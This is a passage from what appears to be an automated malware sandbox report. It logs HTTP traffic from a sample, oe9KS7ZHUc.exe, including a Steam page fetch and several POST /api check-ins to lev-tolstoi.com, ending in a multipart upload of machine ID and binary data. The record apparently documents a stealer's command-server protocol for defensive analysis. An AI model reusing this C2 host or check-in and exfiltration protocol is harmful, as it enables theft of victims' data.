                                                                                                                                                                                                                                                    2024-12-28 09:07:33 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                    Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                    2024-12-28 09:07:33 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                    Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    1192.168.2.449732104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:34 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 8
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:34 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                    Data Ascii: act=life
                                                                                                                                                                                                                                                    2024-12-28 09:07:35 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:35 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=07eesk8mn3iss8669bar4n5p31; expires=Wed, 23 Apr 2025 02:54:14 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCWuBW5v77hv11Pab1M9%2Bs9o0rjuqsHGS%2FZaiDv9prR5sQbIOrit3MXADcJ3leoBVPdjLWxl684n18u4xlQ0wuU33T9AcE3Xjvmf80d9%2FYKHOeiBcJsrEl5ZjculwWNiGIM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f9066a02d280f43-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1474&min_rtt=1468&rtt_var=562&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1926121&cwnd=32&unsent_bytes=0&cid=243be93b28c96af5&ts=744&x=0"
                                                                                                                                                                                                                                                    2024-12-28 09:07:35 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 2ok
                                                                                                                                                                                                                                                    2024-12-28 09:07:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    2192.168.2.449733104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:36 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 53
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:36 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1121INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:37 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Set-Cookie: PHPSESSID=gcnju9hmdr28rlomg69m859lpl; expires=Wed, 23 Apr 2025 02:54:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pmpMcR7ExegyL1TIEAfjo03mCItB5dfjPxNWmf6qTPVd2dX82TXjiGurN4ZSo2rte3rSq98TMOdiK0%2FfLkIdzorrQ5mbRqoNJ8kB1kXkPUjF%2BWKWvdZy0Szo3LfR4iRf7ec%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f9066acedcd8c96-EWR
                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1802&rtt_var=696&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1548250&cwnd=188&unsent_bytes=0&cid=49a4941fa70b2d2b&ts=757&x=0"
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC248INData Raw: 31 34 38 65 0d 0a 62 2b 63 31 50 4e 32 79 66 2b 4f 6a 31 37 39 56 7a 6d 39 30 70 67 4d 74 6b 57 75 2f 6e 36 6e 67 50 30 2f 72 5a 69 72 72 39 5a 6f 55 78 55 4d 65 35 34 5a 54 77 64 43 79 6e 57 2b 36 48 51 48 44 4c 77 2f 77 44 35 32 6c 7a 34 46 54 50 49 35 4b 43 4a 32 59 75 46 57 42 56 46 43 75 31 31 50 42 78 71 2b 64 62 35 55 55 56 73 4e 74 44 36 74 4a 32 76 58 4c 67 56 4d 74 69 67 31 46 6d 35 6e 35 42 34 74 53 56 4c 6a 52 47 34 4c 50 75 74 6f 77 71 77 34 65 79 47 70 41 2b 51 61 64 73 34 75 46 52 57 33 52 52 47 65 4f 67 66 73 69 68 6b 5a 58 2f 38 39 54 6d 49 47 79 30 58 66 30 54 52 58 44 59 55 48 33 44 39 54 33 77 59 68 62 4c 49 38 4d 57 6f 4b 54 38 67 65 46 55 56 57 79 32 41 2b 50 78 62 33 52 4e 71 45 4f 56 6f 6f 68 53 4f 74 4a 68 62
                                                                                                                                                                                                                                                    Data Ascii: 148eb+c1PN2yf+Oj179Vzm90pgMtkWu/n6ngP0/rZirr9ZoUxUMe54ZTwdCynW+6HQHDLw/wD52lz4FTPI5KCJ2YuFWBVFCu11PBxq+db5UUVsNtD6tJ2vXLgVMtig1Fm5n5B4tSVLjRG4LPutowqw4eyGpA+Qads4uFRW3RRGeOgfsihkZX/89TmIGy0Xf0TRXDYUH3D9T3wYhbLI8MWoKT8geFUVWy2A+Pxb3RNqEOVoohSOtJhb
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 32 59 73 46 34 38 6d 42 46 46 6d 5a 47 34 45 73 74 4f 48 72 6a 63 58 64 6d 42 76 64 45 35 71 51 34 5a 77 32 42 50 34 51 62 64 2f 73 4f 4b 57 53 65 47 43 30 65 48 6e 66 38 46 6a 46 42 52 75 4e 67 62 6a 73 4c 31 6b 33 65 72 46 56 61 63 49 57 2f 6a 43 74 37 70 78 70 4d 64 4d 73 63 64 43 49 36 62 75 46 58 46 55 56 43 2b 33 52 32 54 79 62 37 57 4d 72 34 47 48 38 6c 73 54 2f 34 44 30 76 37 4c 68 56 63 6e 68 67 35 4d 68 4a 72 2b 44 59 55 58 45 50 2f 58 42 63 47 5a 39 66 34 79 76 41 6f 61 30 69 4e 31 73 78 61 54 35 49 75 46 55 57 33 52 52 45 43 4d 6c 50 73 47 69 6c 52 57 74 4d 49 64 6b 38 65 34 32 43 57 71 43 42 6a 4f 59 6c 33 35 42 39 76 2b 77 6f 6c 55 4b 49 34 41 43 4d 66 58 2f 78 58 46 44 78 36 65 33 52 61 4e 79 36 4c 64 64 37 4e 44 44 34 52 6d 51 37 4e 52 6e
                                                                                                                                                                                                                                                    Data Ascii: 2YsF48mBFFmZG4EstOHrjcXdmBvdE5qQ4Zw2BP4Qbd/sOKWSeGC0eHnf8FjFBRuNgbjsL1k3erFVacIW/jCt7pxpMdMscdCI6buFXFUVC+3R2Tyb7WMr4GH8lsT/4D0v7LhVcnhg5MhJr+DYUXEP/XBcGZ9f4yvAoa0iN1sxaT5IuFUW3RRECMlPsGilRWtMIdk8e42CWqCBjOYl35B9v+wolUKI4ACMfX/xXFDx6e3RaNy6Ldd7NDD4RmQ7NRn
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 64 59 38 6b 44 55 4d 6e 50 75 43 65 47 51 31 32 31 6b 69 69 43 7a 37 76 61 49 65 77 53 57 4e 30 68 53 50 39 4a 68 62 33 47 67 31 55 72 6d 77 74 46 69 70 6e 32 41 6f 42 59 56 72 2f 51 45 49 54 46 76 74 59 30 6f 51 6b 45 7a 6d 46 48 39 67 6a 58 39 34 76 4d 48 53 71 52 52 42 44 4a 70 75 38 47 78 32 4a 64 73 64 34 61 6c 34 47 71 6b 79 37 73 43 68 71 45 4f 51 2f 2b 41 64 6a 34 78 49 4e 58 49 34 77 4f 52 49 47 5a 2b 78 2b 4b 55 31 36 7a 32 42 65 4d 7a 37 48 56 50 71 63 47 45 4d 52 67 52 62 4e 48 6e 66 72 54 77 67 56 74 76 51 4e 45 68 4a 69 36 4f 49 5a 5a 55 4c 6a 47 58 5a 36 50 72 4a 30 77 6f 45 31 4f 68 47 31 47 38 77 4c 58 2b 63 75 46 55 43 69 4b 41 30 75 45 6b 50 49 44 67 6c 4e 53 74 74 30 62 67 63 61 78 32 43 57 70 42 42 72 49 49 51 47 7a 44 73 57 39 6b 38
                                                                                                                                                                                                                                                    Data Ascii: dY8kDUMnPuCeGQ121kiiCz7vaIewSWN0hSP9Jhb3Gg1UrmwtFipn2AoBYVr/QEITFvtY0oQkEzmFH9gjX94vMHSqRRBDJpu8Gx2Jdsd4al4Gqky7sChqEOQ/+Adj4xINXI4wORIGZ+x+KU16z2BeMz7HVPqcGEMRgRbNHnfrTwgVtvQNEhJi6OIZZULjGXZ6PrJ0woE1OhG1G8wLX+cuFUCiKA0uEkPIDglNStt0bgcax2CWpBBrIIQGzDsW9k8
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 52 42 44 4a 6e 76 45 66 69 31 6c 58 73 74 59 56 68 73 2b 34 31 6a 47 6e 43 68 48 43 62 45 66 2b 44 4e 37 38 7a 34 68 50 4c 6f 49 4f 52 59 50 58 74 6b 32 43 54 78 37 6e 6b 44 71 4e 36 4b 58 47 4a 62 70 4e 43 59 70 34 44 2f 51 46 6e 61 57 4c 67 56 49 6b 68 67 78 41 68 70 6a 38 41 34 4e 52 55 37 72 66 46 35 50 4a 75 39 41 38 6f 77 59 45 78 47 78 4c 2f 77 33 56 39 73 48 43 45 32 32 4f 48 41 6a 52 31 38 30 41 69 6c 64 64 71 5a 41 43 7a 39 6a 31 32 6a 76 73 56 56 62 49 62 30 2f 38 42 64 48 32 77 34 4e 52 49 34 34 42 51 59 47 66 36 67 79 42 58 31 2b 78 33 78 79 46 78 4c 44 5a 4d 4b 67 4c 47 59 51 76 44 2f 51 52 6e 61 57 4c 72 58 6f 59 79 79 56 79 79 59 69 32 46 4d 56 51 55 76 2b 49 58 59 33 43 75 64 55 34 71 67 51 61 7a 6d 68 45 2f 77 4c 5a 38 63 4b 48 57 79 79
                                                                                                                                                                                                                                                    Data Ascii: RBDJnvEfi1lXstYVhs+41jGnChHCbEf+DN78z4hPLoIORYPXtk2CTx7nkDqN6KXGJbpNCYp4D/QFnaWLgVIkhgxAhpj8A4NRU7rfF5PJu9A8owYExGxL/w3V9sHCE22OHAjR180AilddqZACz9j12jvsVVbIb0/8BdH2w4NRI44BQYGf6gyBX1+x3xyFxLDZMKgLGYQvD/QRnaWLrXoYyyVyyYi2FMVQUv+IXY3CudU4qgQazmhE/wLZ8cKHWyy
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC915INData Raw: 35 44 78 48 34 74 61 55 62 66 59 46 49 44 46 73 4e 41 78 6f 41 63 58 77 32 39 42 2b 30 6d 54 76 63 79 61 48 58 58 4a 4a 56 69 53 68 65 34 41 70 46 70 52 2f 38 39 54 6d 49 47 79 30 58 66 30 54 52 2f 57 5a 55 4c 68 41 4e 72 7a 78 49 46 50 4c 49 51 50 57 6f 36 59 2f 41 71 4a 55 56 47 35 30 52 69 4c 7a 62 4c 59 50 4b 4d 42 56 6f 6f 68 53 4f 74 4a 68 62 33 6c 69 55 34 36 69 67 70 44 6e 34 79 34 45 73 74 4f 48 72 6a 63 58 64 6d 42 74 74 59 38 71 41 30 61 78 47 56 43 38 78 76 53 2b 73 79 4c 56 6a 2b 44 41 30 2b 43 6e 2f 4d 43 67 30 56 53 73 63 49 59 6b 39 50 31 6b 33 65 72 46 56 61 63 49 58 6e 30 47 63 33 2b 69 62 4e 4c 4c 70 38 50 52 59 58 58 35 30 4f 63 46 31 6d 7a 6b 45 58 42 78 37 72 55 4e 4b 4d 4d 48 38 68 73 53 76 6f 4d 33 50 76 50 69 46 63 74 6a 77 4a 4a
                                                                                                                                                                                                                                                    Data Ascii: 5DxH4taUbfYFIDFsNAxoAcXw29B+0mTvcyaHXXJJViShe4ApFpR/89TmIGy0Xf0TR/WZULhANrzxIFPLIQPWo6Y/AqJUVG50RiLzbLYPKMBVoohSOtJhb3liU46igpDn4y4EstOHrjcXdmBttY8qA0axGVC8xvS+syLVj+DA0+Cn/MCg0VSscIYk9P1k3erFVacIXn0Gc3+ibNLLp8PRYXX50OcF1mzkEXBx7rUNKMMH8hsSvoM3PvPiFctjwJJ
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 33 34 38 65 0d 0a 73 38 72 77 63 5a 77 32 64 4c 38 77 4c 61 38 38 32 48 56 69 54 4a 53 67 69 4f 6a 37 68 56 78 58 46 39 72 63 49 76 6a 38 4b 75 6e 53 6a 69 46 46 62 44 62 51 2b 72 53 64 62 31 78 4a 42 59 4a 49 45 41 51 59 6d 54 38 67 43 43 56 31 75 79 31 52 6d 50 78 62 4c 64 4f 36 4d 4b 48 73 74 6c 54 2f 78 4a 6b 37 33 4d 6d 68 31 31 79 53 52 44 6e 37 62 32 42 70 63 58 51 66 48 4a 58 59 62 4e 39 59 56 33 6f 67 51 58 7a 47 39 44 2b 77 33 50 2f 63 43 4c 55 69 79 47 42 45 75 49 6e 66 41 66 67 31 64 56 74 39 63 56 68 63 2b 6e 33 44 6a 73 51 31 62 44 65 51 2b 72 53 65 7a 72 7a 49 56 53 62 36 41 44 55 34 69 64 2b 77 61 4a 46 30 48 78 79 56 32 47 7a 66 57 46 64 36 45 42 47 38 42 7a 51 2f 4d 4a 31 50 72 42 6b 46 49 69 68 41 64 49 6a 49 58 35 48 34 70 63 57 37 7a
                                                                                                                                                                                                                                                    Data Ascii: 348es8rwcZw2dL8wLa882HViTJSgiOj7hVxXF9rcIvj8KunSjiFFbDbQ+rSdb1xJBYJIEAQYmT8gCCV1uy1RmPxbLdO6MKHstlT/xJk73Mmh11ySRDn7b2BpcXQfHJXYbN9YV3ogQXzG9D+w3P/cCLUiyGBEuInfAfg1dVt9cVhc+n3DjsQ1bDeQ+rSezrzIVSb6ADU4id+waJF0HxyV2GzfWFd6EBG8BzQ/MJ1PrBkFIihAdIjIX5H4pcW7z
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 37 37 50 50 4b 51 4f 47 4d 78 6f 54 2f 30 4a 33 50 44 4c 77 68 4e 74 6a 68 77 49 30 64 66 64 4c 70 4a 42 56 50 33 7a 43 70 66 4c 73 74 45 68 70 77 77 56 30 6d 78 66 73 30 65 64 37 4d 79 54 48 58 57 66 46 46 2b 4f 69 4c 59 55 78 56 42 53 2f 34 68 64 69 73 36 37 30 44 79 6f 42 42 50 4d 59 6b 72 32 41 39 48 78 79 6f 70 55 4a 34 77 42 54 6f 4f 55 39 67 4b 45 57 31 71 32 33 68 54 42 6a 2f 58 61 4c 2b 78 56 56 76 4a 78 53 4f 73 45 7a 62 2f 35 67 55 77 38 6e 41 6c 59 6a 39 58 58 44 6f 6c 55 57 37 6a 41 58 5a 36 50 72 4a 30 77 6f 45 31 4f 68 47 46 4c 2f 77 72 61 38 38 53 50 55 69 71 43 43 30 4b 48 68 66 63 49 6a 56 74 57 73 73 49 58 69 39 4f 38 31 44 71 69 42 51 54 48 49 51 47 7a 44 73 57 39 6b 38 4a 76 4a 34 6f 49 58 6f 53 59 75 42 4c 4c 54 68 36 34 33 46 33 5a
                                                                                                                                                                                                                                                    Data Ascii: 77PPKQOGMxoT/0J3PDLwhNtjhwI0dfdLpJBVP3zCpfLstEhpwwV0mxfs0ed7MyTHXWfFF+OiLYUxVBS/4hdis670DyoBBPMYkr2A9HxyopUJ4wBToOU9gKEW1q23hTBj/XaL+xVVvJxSOsEzb/5gUw8nAlYj9XXDolUW7jAXZ6PrJ0woE1OhGFL/wra88SPUiqCC0KHhfcIjVtWssIXi9O81DqiBQTHIQGzDsW9k8JvJ4oIXoSYuBLLTh643F3Z
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 66 69 54 52 6d 45 4f 58 61 7a 51 5a 33 43 68 63 4a 46 62 64 46 45 66 59 71 5a 39 67 71 54 52 68 4f 63 78 77 75 4c 32 76 66 37 4d 4c 30 45 41 4d 6c 7a 44 37 31 4a 32 37 32 54 30 68 4e 74 6a 52 55 49 30 63 65 71 56 74 41 45 43 65 2b 43 41 73 2f 59 39 63 74 33 39 46 39 59 68 48 4d 50 71 30 6d 61 2f 74 6d 51 57 79 36 66 42 77 2b 33 71 64 67 47 6b 31 5a 54 74 4e 77 6a 76 39 53 32 30 7a 6d 72 47 77 65 45 4c 77 2f 38 53 59 58 45 69 38 6f 64 45 73 64 45 55 4d 6e 50 75 44 69 47 57 56 43 34 78 67 7a 4d 34 62 37 4c 4e 71 45 47 47 6f 5a 67 51 75 4d 4f 6e 62 4f 4c 68 42 31 31 32 55 6f 49 6a 59 61 34 56 64 55 46 42 65 71 44 53 74 47 54 71 70 4d 75 37 42 74 57 6e 44 4d 42 73 78 75 64 70 59 76 46 58 6a 2b 62 41 6b 75 66 6c 4c 38 7a 75 33 64 56 73 39 4d 52 67 4d 62 31 6b
                                                                                                                                                                                                                                                    Data Ascii: fiTRmEOXazQZ3ChcJFbdFEfYqZ9gqTRhOcxwuL2vf7ML0EAMlzD71J272T0hNtjRUI0ceqVtAECe+CAs/Y9ct39F9YhHMPq0ma/tmQWy6fBw+3qdgGk1ZTtNwjv9S20zmrGweELw/8SYXEi8odEsdEUMnPuDiGWVC4xgzM4b7LNqEGGoZgQuMOnbOLhB112UoIjYa4VdUFBeqDStGTqpMu7BtWnDMBsxudpYvFXj+bAkuflL8zu3dVs9MRgMb1k
                                                                                                                                                                                                                                                    2024-12-28 09:07:37 UTC1369INData Raw: 47 6c 6a 6f 61 6f 46 36 4e 72 39 54 4d 52 47 32 66 52 42 44 62 32 62 67 66 78 51 38 65 2b 4e 4d 50 6b 38 65 32 79 7a 54 72 4d 79 6a 69 59 6b 6a 31 43 74 50 71 32 73 42 79 4c 6f 49 49 52 49 36 42 78 6a 4f 51 56 46 43 78 31 77 75 51 67 66 75 64 4f 4f 78 56 4c 34 52 77 52 66 52 46 6c 62 48 61 6b 56 4d 6d 6e 77 4d 49 74 74 6d 34 46 63 55 50 48 6f 72 54 45 34 2f 47 6f 38 78 36 69 67 34 52 77 6d 4a 42 35 42 69 64 73 34 75 45 48 58 58 62 53 67 69 4e 68 72 68 56 31 51 55 46 36 6f 4e 4b 30 5a 4f 71 6b 79 37 73 47 31 61 63 4d 67 47 7a 47 35 32 6c 69 38 56 54 49 49 67 48 52 6f 71 46 36 67 75 47 51 56 33 34 37 69 4f 6b 7a 4c 6a 59 4f 61 73 7a 4b 4f 56 72 58 2f 34 47 32 73 50 31 74 55 77 71 6d 55 5a 75 69 6f 48 37 54 63 73 58 52 76 2b 49 58 61 44 4c 70 64 41 34 71 30
                                                                                                                                                                                                                                                    Data Ascii: GljoaoF6Nr9TMRG2fRBDb2bgfxQ8e+NMPk8e2yzTrMyjiYkj1CtPq2sByLoIIRI6BxjOQVFCx1wuQgfudOOxVL4RwRfRFlbHakVMmnwMIttm4FcUPHorTE4/Go8x6ig4RwmJB5Bids4uEHXXbSgiNhrhV1QUF6oNK0ZOqky7sG1acMgGzG52li8VTIIgHRoqF6guGQV347iOkzLjYOaszKOVrX/4G2sP1tUwqmUZuioH7TcsXRv+IXaDLpdA4q0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    3192.168.2.449734104.21.66.864437292C:\Users\user\Desktop\oe9KS7ZHUc.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-28 09:07:39 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=29JZWVK5YK3EFDIDV
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Length: 18163
                                                                                                                                                                                                                                                    Host: lev-tolstoi.com
                                                                                                                                                                                                                                                    2024-12-28 09:07:39 UTC15331OUTData Raw: 2d 2d 32 39 4a 5a 57 56 4b 35 59 4b 33 45 46 44 49 44 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 42 43 34 43 30 41 42 45 46 43 45 33 35 39 38 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 39 4a 5a 57 56 4b 35 59 4b 33 45 46 44 49 44 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 32 39 4a 5a 57 56 4b 35 59 4b 33 45 46 44 49 44 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66
                                                                                                                                                                                                                                                    Data Ascii: --29JZWVK5YK3EFDIDVContent-Disposition: form-data; name="hwid"4BC4C0ABEFCE3598BEBA0C6A975F1733--29JZWVK5YK3EFDIDVContent-Disposition: form-data; name="pid"2--29JZWVK5YK3EFDIDVContent-Disposition: form-data; name="lid"LOGS11--LiveTraf
                                                                                                                                                                                                                                                    2024-12-28 09:07:39 UTC2832OUTData Raw: 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9
                                                                                                                                                                                                                                                    Data Ascii: xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{
                                                                                                                                                                                                                                                    2024-12-28 09:07:40 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Sat, 28 Dec 2024 09:07:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
